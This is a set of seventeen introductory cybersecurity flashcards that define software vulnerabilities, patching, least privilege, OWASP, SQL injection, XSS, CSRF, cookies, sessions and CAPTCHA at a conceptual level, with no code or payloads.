csf Flashcards
(17 cards)
What are the two categories of software?
- Application Software (e.g., MS Office)
- System Software (e.g., MS Windows)
Application software is designed for end-users, while system software manages and controls hardware components.
What defines software vulnerabilities?
- Existence of a flaw in the software
- Possibility of the attacker gaining access to the flaw
- Ability of the attacker to exploit that flaw
Vulnerabilities can allow hackers or malware to exploit software for malicious purposes.
What is the purpose of software patching?
To ensure that all systems have up-to-date patches to prevent exploitation of known vulnerabilities
Regular patching is a crucial security practice to maintain software integrity.
What principle does Access Management enforce?
The principle of Least Privilege
This principle minimizes access privileges required to perform job functions, reducing the attack surface.
What is a web application?
Application software that runs on a web server and is accessed through a web browser
Web applications differ from traditional software as they rely on network connectivity.
What organization is the Open Web Application Security Project Foundation (OWASP)?
A non-profit organization aimed at spreading awareness of software security globally
OWASP provides resources like the OWASP Top 10 list of critical security risks.
What is the OWASP Top 10?
A list of the most common and critical security risks seen in web applications
Each risk is ranked based on various factors like exploitability and impact.
What is SQL Injection?
A vulnerability that allows an attacker to manipulate SQL queries to gain unauthorized access to a database
It often occurs due to insufficient validation of user input.
What does Cross-Site Scripting (XSS) target?
The users of the web application, not the application itself
XSS involves executing malicious code in the context of a legitimate website.
What is the purpose of input validation?
To verify if the type of input submitted by a user is allowed
Input validation ensures that only acceptable data is processed by the application.
What are cookies?
- Small text files stored on a user’s computer by a web server
- Used to identify users and store preferences
Cookies play a critical role in user sessions and personalization on websites.
How are sessions defined in web applications?
Server-side storage of information about the user’s interaction with the web application
Sessions begin when a user logs in and end when they log out.
What is Cross-Site Request Forgery (CSRF)?
An attack that tricks a user into executing unwanted actions on a web application where they are authenticated
CSRF exploits the user’s active session to perform unauthorized actions.
What is a technique to prevent XSRF attacks?
Use of a challenge token or an unpredictable token in HTTP requests
Tokens should be unique per user session to enhance security.
What does CAPTCHA stand for?
Completely Automated Public Turing test to tell Computers and Humans Apart
CAPTCHA helps distinguish between human users and automated bots.
What is the impact of software vulnerabilities?
They can negatively affect the performance and security of software
Vulnerabilities can lead to data breaches and unauthorized access.
What is the recommended reading for SQL Injection attacks?
https://www.w3schools.com/sql/sql_injection.asp
This resource provides detailed information on SQL injection vulnerabilities and prevention methods.
